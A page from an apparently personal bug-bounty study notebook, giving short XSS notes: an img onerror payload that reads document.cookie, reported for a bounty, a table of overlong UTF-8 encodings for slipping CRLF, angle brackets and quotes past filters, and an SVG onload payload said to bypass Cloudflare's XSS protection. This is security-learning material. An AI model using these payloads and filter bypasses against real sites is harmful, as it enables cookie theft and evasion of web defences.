Hiroki_study
  • README
  • Bughunter
    • 知识积累
      • DOS
      • Insecure Direct Object Reference (IDOR)
      • Race condition
      • WEB缓存
      • XSS
      • websockets
      • 子域名接管
      • media
        • 业务逻辑错误
    • Bughunter-report
      • CSRF
        • CSRF Bypass
        • 2023-11-24
      • DOS
        • 2023-10-04
      • IDOR
        • 2023-09-18
        • 2023-09-19
        • 富文本编辑器漏洞
      • Race Condition
        • 2023-09-21
        • 2023-09-26
      • Subdomain Takeover
        • Github页面接管—子域名接管
        • 富文本编辑器漏洞
      • Tips&&bypass
        • Tips
        • WAF Cloudflare bypass leads to First bounty 🤑🤑
      • Top Business Logic reports
        • 业务逻辑漏洞
      • Web Cache
        • 缓存中毒
        • 缓存欺骗
      • XSS
        • 2023-09-21
    • 漏洞挖掘
      • 0.环境配置
        • 0.环境配置
      • 1.Checklist
        • 0.Checklist
        • 登录框
        • 密码找回
        • 支付
        • 4.敏感信息泄露
  • draw
    • Drawing 2023-11-11 15.58.41
    • autoshell
    • autosrc
    • autostudy
  • 计算机科学
    • 0.计算机导论
      • 0.
    • 3.计算机网络
      • weblogic中间件漏洞
    • 4.数据结构与算法
      • 基本概念
  • 网络安全
    • 00.网络基础
      • 0.网络基础
      • weblogic中间件漏洞
    • 01.后端漏洞
      • 富文本编辑器漏洞
      • SQL注入
        • SQL注入基础
    • 02.前端漏洞
      • 0.浏览器的安全模型
      • 1.XSS
      • 2.Javascript伪协议
      • Sanitization
      • Spring SpEL表达式注入
      • DOM 与window 的量子纠缠
      • 6.CSTI
      • springboot漏洞
      • strust2
      • 99.编码和事件
      • csrf
    • 03.逻辑漏洞
      • 0.业务逻辑漏洞
      • 1.访问控制漏洞
      • 2.条件竞争漏洞
      • 3.支付安全漏洞
    • 04.API漏洞
      • GraphQL API漏洞
    • 06.WebSockets
      • 0.WebSocket基础
    • media
      • Appsec-Modern-copy
    • 08.应急响应
      • 入侵排查
        • Linux入侵排查
    • 09.Java代码审计
      • Java 安全基础
        • 富文本编辑器漏洞
        • 2023-09-25
        • 不安全的反序列化
      • Java 开发基础
        • Java基础
      • 实战
        • 泛微OA
      • 常见漏洞专项审计
        • 反射和动态代理
      • 通用性漏洞审计
        • 类字节码、类加载机制
        • XSS
        • FastJson反序列化
        • Log4j
        • Shiro反序列化
        • Spring SpEL表达式注入
        • springboot漏洞
        • strust2
Powered by GitBook
On this page
  • xss
  • Bug Bounty Tips
  • Cloudflare XSS protection bypass
Edit on GitHub
  1. Bughunter
  2. Bughunter-report
  3. XSS

2023-09-21

PreviousXSSNext漏洞挖掘

Last updated 1 year ago

#xss

Step

  1. xsshunter

  2. id处 h"<img src=x onerror=alert(document.cookie)>

  3. 500💵

Bug Bounty Tips

#tips #bypass #xss #crlf

Step

Overlong UTF-8 encoding Attack

2-byte / 3-byte ⇒ original

C0%8A / %E0%80%8A ⇒ %0A
%C0%8D / %E0%80%8D ⇒ %0D
%C0%BE / %E0%80%BE ⇒ %3E (>)
%C0%BC / %E0%80%BC ⇒ %3C (<)
%C0%A2 / %E0%80%A2 ⇒ %22 (")
%C0%A7 / %E0%80%A7 ⇒ %27 (')

Cloudflare XSS protection bypass

#bypass #xss #Cloudflare

Step

"&gt;&lt;Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))&gt;

For XSS, CRLF, WAF bypass https://jsfiddle.net/bw1Lhxnt

xss
bypass